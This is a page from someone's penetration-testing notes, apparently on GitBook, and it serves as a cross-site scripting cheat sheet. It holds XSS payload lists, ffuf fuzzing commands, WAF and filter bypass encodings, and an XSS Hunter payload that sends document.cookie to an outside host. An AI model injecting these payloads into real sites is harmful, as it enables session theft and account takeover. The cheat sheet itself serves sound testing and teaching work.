TamaGorengs Notes
  • πŸ‘¨β€πŸ’»Whoami
  • πŸ—ΊοΈActive Directory
    • Active Directory Enumeration
    • AD Reconnaissance
      • LDAP
    • Movement
      • Kerberos
        • ASREProast
        • Pass The Hash
        • Pass The Ticket
        • Overpass The Hash
      • Credential
        • Dumping
          • DCSync
      • WMI and WinRM
    • Active Directory Certificate Services (ADCS)
  • πŸͺŸWindows
    • Windows Privilege Escalation
      • WinPrivEsc Enumeration
      • Leveraging Windows Services
      • Abusing Other Windows Components
    • RDP
  • 🐧Linux
    • Linux Privilege Escalation
      • LinuxPrivEsc Enumeration
      • Exposed Confidential Information
      • Insecure File Permissions
      • Insecure System Components
  • πŸ•ΈοΈWeb Application
    • SQL Injection
    • Cross-Site Scripting (XSS)
  • Group 1
    • Client-Side Attacks
      • Windows Library Files
      • Exploiting Microsoft Office
  • Thick Client
    • Thick Client Pentest
    • Thick Client Pentest Methodology
Powered by GitBook
On this page
  • Quick Payloads
  • Testing Methodology
  • Common Vulnerable Endpoints
  • Tools & Commands
  • Common Bypass Techniques
  • References

Was this helpful?

  1. Web Application

Cross-Site Scripting (XSS)

Quick Payloads

Basic XSS

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<div onmouseover="alert(1)">Hover me</div>

Event Handlers

onclick=alert(1)
onmouseover=alert(1)
onerror=alert(1)
onload=alert(1)
onfocus=alert(1)
onblur=alert(1)

JavaScript Events

javascript:alert(1)
data:text/html,<script>alert(1)</script>
vbscript:alert(1)

DOM Based

document.write('<script>alert(1)</script>')
eval('alert(1)')
setTimeout('alert(1)',0)
setInterval('alert(1)',0)

Testing Methodology

1. Parameter Fuzzing

# Using ffuf
ffuf -u "http://target.com/page?param=FUZZ" -w xss-payloads.txt

# Using Burp Suite
1. Intercept request
2. Send to Intruder
3. Select parameter
4. Load payload list

2. Common Test Points

URL Parameters: ?search=<script>alert(1)</script>
Form Fields: <input name="username" value="<script>alert(1)</script>">
Headers: User-Agent: <script>alert(1)</script>
JSON: {"name": "<script>alert(1)</script>"}

3. Context Testing

# HTML Context
<div><script>alert(1)</script></div>
<div><img src=x onerror=alert(1)></div>

# Attribute Context
<input value=""><script>alert(1)</script>">
<input value=""><img src=x onerror=alert(1)>">

# JavaScript Context
<script>var x = "<script>alert(1)</script>";</script>
<script>var x = "\";alert(1);//";</script>

Common Vulnerable Endpoints

Search Forms

search=<script>alert(1)</script>
search=<img src=x onerror=alert(1)>
search=<svg onload=alert(1)>

Comment Sections

comment=<script>alert(1)</script>
comment=<img src=x onerror=alert(1)>
comment=<svg onload=alert(1)>

User Profiles

name=<script>alert(1)</script>
bio=<img src=x onerror=alert(1)>
avatar=<svg onload=alert(1)>

Tools & Commands

XSS Hunter

# Basic payload
<script src="https://xss.ht"></script>

# DOM based
<script>fetch('https://xss.ht/'+document.cookie)</script>

Custom Python Script

import requests

def test_xss(url, param, payloads):
    for payload in payloads:
        data = {param: payload}
        r = requests.post(url, data=data)
        if payload in r.text:
            print(f"Potential XSS: {payload}")

Common Bypass Techniques

WAF Bypass

# Case variation
<ScRiPt>alert(1)</ScRiPt>
<IMG src=x OnErRoR=alert(1)>

# Encoding
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
%3Cscript%3Ealert(1)%3C/script%3E

# Double encoding
%253Cscript%253Ealert(1)%253C/script%253E

Filter Bypass

# Script tag bypass
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

# Event handler bypass
<div onmouseover="alert(1)">Hover me</div>
<body onload=alert(1)>

References

PreviousSQL InjectionNextClient-Side Attacks

Last updated 1 month ago

Was this helpful?

πŸ•ΈοΈ
OWASP XSS
PortSwigger XSS
XSS Hunter